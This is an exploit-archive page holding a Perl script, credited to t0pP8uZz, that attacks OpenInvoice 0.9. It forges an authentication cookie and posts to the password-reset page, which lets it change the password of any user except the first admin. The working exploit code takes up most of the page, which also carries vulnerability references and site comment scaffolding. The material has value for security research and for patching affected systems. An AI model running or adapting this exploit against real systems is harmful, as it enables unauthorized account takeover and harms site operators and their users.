OpenInvoice 0.9 Arbitrary Change User Password Exploit

2009.03.29
Credit: t0pP8uZz
Risk: High
Local: No
Remote: Yes
CWE: CWE-287

#!/usr/bin/perl # [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] # Discovered && Coded By t0pP8uZz # Discovered On: 18 April 2008 # Vendor has not been notified! # see exploit for more details.. use strict; use LWP::UserAgent; use HTTP::Cookies; print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-\n"; print "-+- (Discovered && Coded By t0pP8uZz) -+-\n"; print "-+- -+-\n"; print "-+- Discovered On: 18 April 2008 / Discovered By: t0pP8uZz -+-\n"; print "-+- OpenInvoice 0.9 beta (and prior) Suffers from Insecure ... -+-\n"; print "-+- ...cookies and admin panel validating, combining the two.. -+-\n"; print "-+- .we can change any users password except for the 1st admin -+-\n"; print "-+- -+-\n"; print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-\n"; print "\nEnter URL (the vuln site): "; chomp(my $url=<STDIN>); print "\nEnter UID (the user id to change pass for): "; chomp(my $uid=<STDIN>); my $domain = $url; my $count = ($domain =~ tr"/""); if($count == 1) { $domain =~ s/\\//; } elsif($count >= 3) { $domain =~ s/http:\/\///; } my $cjar = HTTP::Cookies->new( file => "cookies.txt", autosave => 1 ); $cjar->set_cookie(1, "oiauth", "1", "/", "6oogle.pl"); $cjar->save("cookies.txt"); my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 )', cookie_jar => $cjar ); my $result = $ua->post($url."/resetpass.php", { 'uid' => $uid, 'changepass' => 'Change Password' } ); if($result->is_success() && $result->content !~ /unable to change password/i && $uid != 1) { print "Password successfuly changed for userid: ".$uid."\n"; exit; } print "Exploit Failed! check domain is running OpenInvoice <= 0.9, Check UID isnt 1\n"; exit;

References:

http://xforce.iss.net/xforce/xfdb/41947
http://www.securityfocus.com/bid/28854
http://www.milw0rm.com/exploits/5466


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top